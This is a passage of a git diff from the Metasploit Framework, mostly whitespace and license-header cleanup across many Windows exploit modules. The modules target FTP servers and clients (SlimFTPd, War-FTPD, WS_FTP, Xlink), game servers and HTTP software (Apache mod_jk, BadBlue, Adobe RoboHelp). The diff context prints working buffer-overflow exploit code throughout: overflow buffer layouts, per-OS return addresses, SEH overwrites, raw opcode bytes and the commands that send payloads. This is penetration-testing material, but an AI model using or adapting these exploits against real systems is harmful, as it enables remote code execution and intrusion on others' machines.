paid more attention to skylined's exploit, only after figuring # out how my payloads were getting transformed did I remember seeing \xff # doubling in his CHMOD exploit, arg! shellcode = payload.encoded - + case datastore['ForceDoubling'] when 1 print_status("Forced doubling of all \\xff sequences in the encoded payload") @@ -177,7 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote end jump_back = Rex::Arch::X86.jmp_short('$+' + (-1 * search_code.length).to_s) + 'BB' - + buf = 'MDTM 20031111111111+' + ('A' * (datastore['SEHOffset'] - search_code.length)) buf << search_code buf << jump_back 
@@ -188,14 +183,14 @@ class Metasploit3 < Msf::Exploit::Remote buf << search_rtag send_cmd( [buf], false ) - + handler disconnect end - + def double_ff? res = send_cmd( ['P@SW'], true ) return (res and res =~ /^500/) ? true : false - end + end end diff --git a/modules/exploits/windows/ftp/slimftpd_list_concat.rb b/modules/exploits/windows/ftp/slimftpd_list_concat.rb index b1573dda77..3396954a0b 100644 --- a/modules/exploits/windows/ftp/slimftpd_list_concat.rb +++ b/modules/exploits/windows/ftp/slimftpd_list_concat.rb @@ -3,31 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'SlimFTPd LIST Concatenation Overflow', 'Description' => %q{ - This module exploits a stack overflow in the SlimFTPd + This module exploits a stack overflow in the SlimFTPd server. The flaw is triggered when a LIST command is received with an overly-long argument. This vulnerability affects all versions of SlimFTPd prior to 3.16 and was discovered by Raphael Rigo. - }, 'Author' => [ 'Fairuzan Roslan ' ], 'License' => BSD_LICENSE, @@ -37,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2005-2373'], [ 'OSVDB', '18172'], [ 'BID', '14339'], - ], 'Privileged' => false, 'Payload' => @@ -45,9 +41,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 490, 'BadChars' => "\x00\x0a\x0d\x20\x5c\x2f", 'StackAdjustment' => -3500, - }, - 'Targets' => + 'Targets' => [ [ 'SlimFTPd Server <= 3.16 Universal', 
@@ -60,10 +55,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jul 21 2005', 'DefaultTarget' => 0)) end - + def exploit connect_login - + print_status("Trying target #{target.name}...") buf = make_nops(511) @@ -73,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote send_cmd( ['XMKD', '41414141'], true ); send_cmd( ['CWD', '41414141'], true ); send_cmd( ['LIST', buf], false ) - + handler disconnect end diff --git a/modules/exploits/windows/ftp/trellian_client_pasv.rb b/modules/exploits/windows/ftp/trellian_client_pasv.rb index fcc2d142c0..28b7b94859 100644 --- a/modules/exploits/windows/ftp/trellian_client_pasv.rb +++ b/modules/exploits/windows/ftp/trellian_client_pasv.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered + This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered through an excessively long PASV message. }, 'Author' => diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index ebcd3f8e38..6e2a52d497 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - # Use a copy of the target + # Use a copy of the target mytarget = target if (target['auto']) 
diff --git a/modules/exploits/windows/ftp/warftpd_165_pass.rb b/modules/exploits/windows/ftp/warftpd_165_pass.rb index 5e954b5d67..28c06bc2cb 100644 --- a/modules/exploits/windows/ftp/warftpd_165_pass.rb +++ b/modules/exploits/windows/ftp/warftpd_165_pass.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'War-FTPD 1.65 Password Overflow', 'Description' => %q{ - This exploits the buffer overflow found in the PASS command + This exploits the buffer overflow found in the PASS command in War-FTPD 1.65. This particular module will only work reliably against Windows 2000 targets. The server must be configured to allow anonymous logins for this exploit to @@ -32,14 +30,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'hdm', 'License' => BSD_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '1999-0256'], [ 'OSVDB', '875' ], [ 'BID', '10078' ], [ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ], ], - 'DefaultOptions' => + 'DefaultOptions' => { 'EXITFUNC' => 'process' }, @@ -64,7 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote }, ], ])) - end def exploit diff --git a/modules/exploits/windows/ftp/warftpd_165_user.rb b/modules/exploits/windows/ftp/warftpd_165_user.rb index a43fa5bd04..7174f286b6 100644 --- a/modules/exploits/windows/ftp/warftpd_165_user.rb +++ b/modules/exploits/windows/ftp/warftpd_165_user.rb 
@@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,20 +20,20 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'War-FTPD 1.65 Username Overflow', 'Description' => %q{ - This module exploits a buffer overflow found in the USER command + This module exploits a buffer overflow found in the USER command of War-FTPD 1.65. }, 'Author' => 'Fairuzan Roslan ', 'License' => BSD_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '1999-0256'], [ 'OSVDB', '875' ], [ 'BID', '10078' ], [ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ], ], - 'DefaultOptions' => + 'DefaultOptions' => { 'EXITFUNC' => 'process' }, @@ -79,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Ret' => 0x71ab2b53 # push esp, ret } - ] + ] ])) end diff --git a/modules/exploits/windows/ftp/wftpd_size.rb b/modules/exploits/windows/ftp/wftpd_size.rb index c08b7df86c..ce2f25ace2 100644 --- a/modules/exploits/windows/ftp/wftpd_size.rb +++ b/modules/exploits/windows/ftp/wftpd_size.rb 
@@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Texas Imperial Software WFTPD 3.23 SIZE Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the SIZE verb in + This module exploits a buffer overflow in the SIZE verb in Texas Imperial's Software WFTPD 3.23. }, 'Author' => 'MC', @@ -43,10 +41,10 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 500, 'BadChars' => "\x00\x20\x0a\x0d", - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2d3028 } ], [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dd1595 } ], @@ -59,8 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect_login - sploit = "/" + make_nops(525 - payload.encoded.length) - sploit << payload.encoded + [target.ret].pack('V') + sploit = "/" + make_nops(525 - payload.encoded.length) + sploit << payload.encoded + [target.ret].pack('V') print_status("Trying target #{target.name}...") diff --git a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb index 2e87d827a7..757e7c885c 100644 --- a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb +++ b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb 
@@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'WS-FTP Server 5.03 MKD Overflow', 'Description' => %q{ This module exploits the buffer overflow found in the MKD command in IPSWITCH WS_FTP Server 5.03 discovered by Reed Arvin. - }, 'Author' => [ 'et', 'Reed Arvin ' ], 'License' => BSD_LICENSE, @@ -35,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2004-1135' ], [ 'OSVDB', '12509' ], [ 'BID', '11772'], - ], 'Privileged' => false, 'Payload' => @@ -44,16 +40,16 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ - [ + [ 'WS-FTP Server 5.03 Universal', { 'Platform' => 'win', 'Ret' => 0x25185bb8, # Address is executable to allow XP and 2K # 0x25185bb8 = push esp, ret (libeay32.dll) - # B85B1825XX = mov eax,0xXX25185b + # B85B1825XX = mov eax,0xXX25185b }, ], ], 
@@ -63,28 +59,28 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - disconnect + disconnect if (banner =~ /5\.0\.3/) return Exploit::CheckCode::Vulnerable - end + end return Exploit::CheckCode::Safe end - + def exploit connect_login - + print_status("Trying target #{target.name}...") - + buf = rand_text_alphanumeric(8192) - buf[498, 4] = [ 0x7ffd3001 ].pack('V') + buf[498, 4] = [ 0x7ffd3001 ].pack('V') buf[514, 4] = [ target.ret ].pack('V') buf[518, 4] = [ target.ret ].pack('V') buf[522, 2] = make_nops(2) buf[524, payload.encoded.length] = payload.encoded - + send_cmd( ['MKD', buf], true ); - handler + handler disconnect end diff --git a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb index eba127ba4e..5933ab1e01 100644 --- a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb +++ b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Ipswitch WS_FTP Server 5.05 XMD5 Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the XMD5 verb in + This module exploits a buffer overflow in the XMD5 verb in IPSWITCH WS_FTP Server 5.05. }, 'Author' => 'MC', @@ -42,8 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec663 } ], [ 'Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 } ], 
@@ -56,20 +53,20 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - disconnect + disconnect if (banner =~ /WS_FTP Server 5.0.5/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end - + def exploit connect_login print_status("Trying target #{target.name}...") - sploit = rand_text_alphanumeric(676, payload_badchars) - sploit << [target.ret].pack('V') + payload.encoded + sploit = rand_text_alphanumeric(676, payload_badchars) + sploit << [target.ret].pack('V') + payload.encoded send_cmd( ['XMD5', sploit] , false) diff --git a/modules/exploits/windows/ftp/xftp_client_pwd.rb b/modules/exploits/windows/ftp/xftp_client_pwd.rb index 064e18bbe3..c5e90d9685 100644 --- a/modules/exploits/windows/ftp/xftp_client_pwd.rb +++ b/modules/exploits/windows/ftp/xftp_client_pwd.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit', 'Description' => %q{ - This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered + This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered through an excessively long PWD message. }, 'Author' => diff --git a/modules/exploits/windows/ftp/xlink_client.rb b/modules/exploits/windows/ftp/xlink_client.rb index 90e3df0f8e..efecb57783 100644 --- a/modules/exploits/windows/ftp/xlink_client.rb +++ b/modules/exploits/windows/ftp/xlink_client.rb 
@@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -15,15 +19,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Xlink FTP Client Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Xlink FTP Client 32 - Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2. - When a overly long FTP server response is recieved by a client, - arbitrary code may be executed. + Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2. + When a overly long FTP server response is recieved by a client, + arbitrary code may be executed. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2006-5792' ], [ 'OSVDB', '33969' ], [ 'URL', 'http://www.metasploit.com/' ], @@ -44,21 +48,21 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ [ 'Windows XP Pro SP3 English', { 'Ret' => 0x7d054897 } ], - [ 'Windows 2000 SP4 English', { 'Ret' => 0x7ce02a2d } ], + [ 'Windows 2000 SP4 English', { 'Ret' => 0x7ce02a2d } ], ], 'Privileged' => false, 'DisclosureDate' => 'Oct 3 2009', 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]), ], self.class) end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) sploit = rand_text_alpha_upper(260) + [target.ret].pack('V') + payload.encoded sploit << rand_text_alpha_upper(1024 - payload.encoded.length) + "\r\n" diff --git a/modules/exploits/windows/ftp/xlink_server.rb b/modules/exploits/windows/ftp/xlink_server.rb index d202135818..7eedd531b5 100644 
--- a/modules/exploits/windows/ftp/xlink_server.rb +++ b/modules/exploits/windows/ftp/xlink_server.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -13,13 +17,13 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Xlink FTP Server Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Xlink FTP Server - that comes bundled with Omni-NFS Enterprise 5.2. - When a overly long FTP request is sent to the server, - arbitrary code may be executed. + that comes bundled with Omni-NFS Enterprise 5.2. + When a overly long FTP request is sent to the server, + arbitrary code may be executed. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -45,13 +49,13 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', 'Targets' => - [ - [ 'Omni-NFS Enterprise V5.2', { 'Ret' => 0x1001f09c } ], # OmniEOM.DLL 1.0.0.1 - ], + [ + [ 'Omni-NFS Enterprise V5.2', { 'Ret' => 0x1001f09c } ], # OmniEOM.DLL 1.0.0.1 + ], 'DisclosureDate' => 'Oct 3 2009', 'DefaultTarget' => 0)) - deregister_options('FTPUSER', 'FTPPASS') + deregister_options('FTPUSER', 'FTPPASS') end def check @@ -61,19 +65,19 @@ class Metasploit3 < Msf::Exploit::Remote if (banner =~ /XLINK FTP Server/) return Exploit::CheckCode::Vulnerable end - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Safe end - + def exploit connect sploit = payload.encoded + [target.ret].pack('V') sploit << rand_text_alpha_upper(2024 - payload.encoded.length) + "\r\n" - + print_status("Trying target #{target.name}...") sock.put(sploit) - + handler disconnect 
diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb index 68afea0315..a30246dece 100644 --- a/modules/exploits/windows/games/mohaa_getinfo.rb +++ b/modules/exploits/windows/games/mohaa_getinfo.rb @@ -3,27 +3,25 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Medal Of Honor Allied Assault getinfo Stack Overflow', 'Description' => %q{ - This module exploits a stack based buffer overflow in the getinfo - command of Medal Of Honor Allied Assault. + This module exploits a stack based buffer overflow in the getinfo + command of Medal Of Honor Allied Assault. }, 'Author' => [ 'Jacopo Cervini' ], 'License' => BSD_LICENSE, @@ -42,17 +40,17 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Medal Of Honor Allied Assault v 1.0 Universal', { 'Rets' => [ 111, 0x406957 ] }], # call ebx ], 'DisclosureDate' => 'Jul 17 2004', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(12203) - ], self.class) + register_options( + [ + Opt::RPORT(12203) + ], self.class) end def exploit @@ -79,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote buf << "\x32\x44\x24\x24" # XOR AL,BYTE PTR SS:[ESP+24] buf << "\x49\x49" # DEC ECX buf << "\x31\x48\x34" # XOR DWORD PTR DS:[EAX+34],ECX - buf << "\x58"*11 # POP EAX + buf << "\x58"*11 # POP EAX buf << "\x42"*66 buf << "\x3c"*4 buf << "\x42"*48 
@@ -88,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote req = "\xff\xff\xff\xff\x02" + "getinfo " + buf req << "\r\n\r\n" + make_nops(32) + payload.encoded - udp_sock.put(req) + udp_sock.put(req) handler disconnect_udp diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb index 8b8aa3b9a3..37e5469957 100644 --- a/modules/exploits/windows/games/racer_503beta5.rb +++ b/modules/exploits/windows/games/racer_503beta5.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Racer v0.5.3 beta 5 Buffer Overflow', 'Description' => %q{ - This module explots the Racer Car and Racing Simulator game + This module explots the Racer Car and Racing Simulator game versions v0.5.3 beta 5 and earlier. Both the client and server listen on UDP port 26000. By sending an overly long buffer we are able to execute arbitrary code remotely. @@ -44,21 +42,20 @@ class Metasploit3 < Msf::Exploit::Remote 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # Tested ok patrickw 20090503 [ 'Fmodex.dll - Universal', { 'Ret' => 0x10073FB7 } ], # jmp esp [ 'Win XP SP2 English', { 'Ret' => 0x77d8af0a } ], [ 'Win XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], - ], 'DisclosureDate' => 'Aug 10 2008', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(26000) - ], self.class) + register_options( + [ + Opt::RPORT(26000) + ], self.class) end def exploit 
diff --git a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb index dabfcddcaf..52b2e9d44c 100644 --- a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb +++ b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -11,13 +15,13 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - + def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe RoboHelp Server 8 Arbitrary File Upload and Execute.', 'Description' => %q{ This module exploits a authentication bypass vulnerability which - allows remote attackers to upload and execute arbitrary code. + allows remote attackers to upload and execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -31,8 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-066' ], ], 'Targets' => - [ - [ 'Universal Windows Target', + [ + [ 'Universal Windows Target', { 'Arch' => ARCH_JAVA, 'Payload' => @@ -74,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote 'UID' => uid, } }, 5) - + if ( res and res.message =~ /OK/ ) id = res['sessionid'].to_s.strip diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb index e49400dd3f..adfaad14e4 100644 --- a/modules/exploits/windows/http/altn_securitygateway.rb +++ b/modules/exploits/windows/http/altn_securitygateway.rb 
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Alt-N SecurityGateway username Buffer Overflow', 'Description' => %q{ - Alt-N SecurityGateway is prone to a buffer overflow condition. This + Alt-N SecurityGateway is prone to a buffer overflow condition. This is due to insufficient bounds checking on the "username" parameter. Successful exploitation could result in code execution with SYSTEM level privileges. @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00" + ((0x40..0x5a).to_a + [ 0x8a, 0x8c, 0x8e, 0x9f ] + (0xc0..0xdf).to_a).pack('C*'), 'StackAdjustment' => -3500, 'EncoderType' => Msf::Encoder::Type::SingleStaticBit, - 'EncoderOptions' => + 'EncoderOptions' => { 'BitNumber' => 0x5, 'BitValue' => true, @@ -66,7 +66,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 02 2008')) - register_options([Opt::RPORT(4000)], self.class) + register_options( + [ + Opt::RPORT(4000) + ], self.class) end diff --git a/modules/exploits/windows/http/apache_chunked.rb b/modules/exploits/windows/http/apache_chunked.rb index 9f3067b756..536b987a45 100644 --- a/modules/exploits/windows/http/apache_chunked.rb +++ b/modules/exploits/windows/http/apache_chunked.rb @@ -304,7 +304,7 @@ class Metasploit3 < Msf::Exploit::Remote # _______________ _______________ ___________ # _________ _____________ | ________ | | ______ | | ______ # v | v | v v | | v v | | v v | - # [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret] + # [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret] # print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]") diff --git a/modules/exploits/windows/http/apache_modjk_overflow.rb b/modules/exploits/windows/http/apache_modjk_overflow.rb index e76cb2a1a3..c353ba3875 100644 --- a/modules/exploits/windows/http/apache_modjk_overflow.rb +++ b/modules/exploits/windows/http/apache_modjk_overflow.rb 
@@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -8,10 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Apache mod_jk 1.2.20 Buffer Overflow', 'Description' => %q{ - This is a stack overflow exploit for mod_jk 1.2.20. + This is a stack overflow exploit for mod_jk 1.2.20. Should work on any Win32 OS. }, 'Author' => 'Nicob ', @@ -38,14 +48,14 @@ class Metasploit3 < Msf::Exploit::Remote 'MaxNops' => 0, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # POP/POP/RET in mod_jk 1.2.20 (Apache 1.3.37, 2.0.58 and 2.2.3) ['mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)', { 'Ret' => 0x6a6b8ef1 }], ], 'DefaultTarget' => 0)) - - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( [ Opt::RPORT(80) ], self.class ) end def check @@ -54,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put("GET / HTTP/1.0\r\n\r\n") resp = sock.get_once disconnect - + if (resp and (m = resp.match(/Server: Apache\/(.*) \(Win32\)(.*) mod_jk\/1.2.20/))) then print_status("Apache version detected : #{m[1]}") return Exploit::CheckCode::Appears 
@@ -77,20 +87,20 @@ class Metasploit3 < Msf::Exploit::Remote # 4343 : Apache/1.3.37 (Win32) mod_jk/1.2.20 # 4407 : Apache/2.0.59 (Win32) mod_jk/1.2.20 # 4423 : Apache/2.2.3 (Win32) mod_jk/1.2.20 - + [ 4343, 4407, 4423 ].each { |seh_offset| sploit[seh_offset - 9, 5] = "\xe9" + [sc_base - seh_offset + 4].pack('V') sploit[seh_offset - 4, 2] = "\xeb\xf9" sploit[seh_offset , 4] = [ target.ret ].pack('V') } - + print_status("Trying target #{target.name}...") sock.put(uri_start + sploit + uri_end) resp = sock.get_once if (resp and (m = resp.match(/(.*)<\/title>/i))) print_status("The exploit failed : HTTP Status Code '#{m[1]}' received :-(") - end + end handler disconnect diff --git a/modules/exploits/windows/http/badblue_ext_overflow.rb b/modules/exploits/windows/http/badblue_ext_overflow.rb index e77f2c238e..8f6b2bff51 100644 --- a/modules/exploits/windows/http/badblue_ext_overflow.rb +++ b/modules/exploits/windows/http/badblue_ext_overflow.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -20,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'BadBlue 2.5 EXT.dll Buffer Overflow', 'Description' => %q{ This is a stack overflow exploit for BadBlue version 2.5. 
@@ -46,41 +44,44 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - ['BadBlue 2.5 (Universal)', { 'Ret' => 0x1003d9da }], + ['BadBlue 2.5 (Universal)', { 'Ret' => 0x1003d9da }], ], 'DisclosureDate' => 'Apr 20 2003', 'DefaultTarget' => 0)) - - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( + [ + Opt::RPORT(80) + ], self.class ) end def check connect - + sock.put("GET / HTTP/1.0\r\n\r\n") resp = sock.get_once disconnect - - if (resp =~ /BadBlue\/2.5/) - return Exploit::CheckCode::Vulnerable - end - return Exploit::CheckCode::Safe + + if (resp =~ /BadBlue\/2.5/) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe end def exploit connect - uri = "GET /ext.dll?mfcisapicommand=" - sploit = rand_text_alphanumeric(500) + uri = "GET /ext.dll?mfcisapicommand=" + sploit = rand_text_alphanumeric(500) seh = generate_seh_payload(target.ret) sploit[492, seh.length] = seh print_status("Trying target #{target.name}...") sock.put(uri + sploit + "\r\n\r\n") - + handler disconnect end diff --git a/modules/exploits/windows/http/badblue_passthru.rb b/modules/exploits/windows/http/badblue_passthru.rb index 8c541343d2..feb0773cdd 100644 --- a/modules/exploits/windows/http/badblue_passthru.rb +++ b/modules/exploits/windows/http/badblue_passthru.rb 
